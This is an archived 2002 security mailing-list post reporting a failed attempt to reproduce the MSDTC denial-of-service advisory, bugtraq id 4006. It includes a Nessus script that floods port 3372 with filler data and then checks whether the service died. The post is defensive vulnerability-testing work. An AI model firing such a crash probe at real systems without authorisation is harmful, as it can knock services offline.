bugtraq id 4006 may not be valid

From: Michael Scheidell (scheidellat_private)
Date: Sun Feb 03 2002 - 18:04:39 PST


    MSDTC dos attack:
          bugtraq id 4006
          object msdtc
          class Failure to Handle Exceptional Conditions
    
    http://www.securityfocus.com/bid/4006
    
    (see :
    tried to reproduce by sending 1024 bytes (and 2048 bytes and 10K bytes) of
    random data to msdtc listening port 3372.
    no effect.
    no ms event log, service still running.
    system is MS win2k, sp2, running ms sql server 7 sp2.
    
    Methodology used: nessus security scanner:
    (am I reading things right in the advisory, and would my script do what the
    advisory suggests?)
    
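    # Skip hosts where port 3372 (MSDTC) is known to be closed
    if (get_port_state(3372))
    {
     sock3372 = open_sock_tcp(3372);
     if (sock3372)
     {
      # Send 10000 bytes of filler data, then disconnect
      send(socket:sock3372, data:crap(10000));
      close(sock3372);
      sleep(5);
      # Reconnect: a failed connection means the service stopped listening
      sock3372_sec = open_sock_tcp(3372);
      if (!sock3372_sec)
      {
       security_hole(port:3372);
      }
      else close(sock3372_sec);
     }
    }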
    
    I verified logic by starting security test and stopping the service by hand
    (and it gave me positive, which is what I would have thought if I manually
    stopped service during test)
    --
    Michael Scheidell
    Secnap Network Security, LLC
    (561) 368-9561 scheidellat_private
    Sign up Live WEBCAST Q & A : Should I migrate from IIS?
    http://www.secnap.net
    



    This archive was generated by hypermail 2b30 : Sun Feb 03 2002 - 18:05:00 PST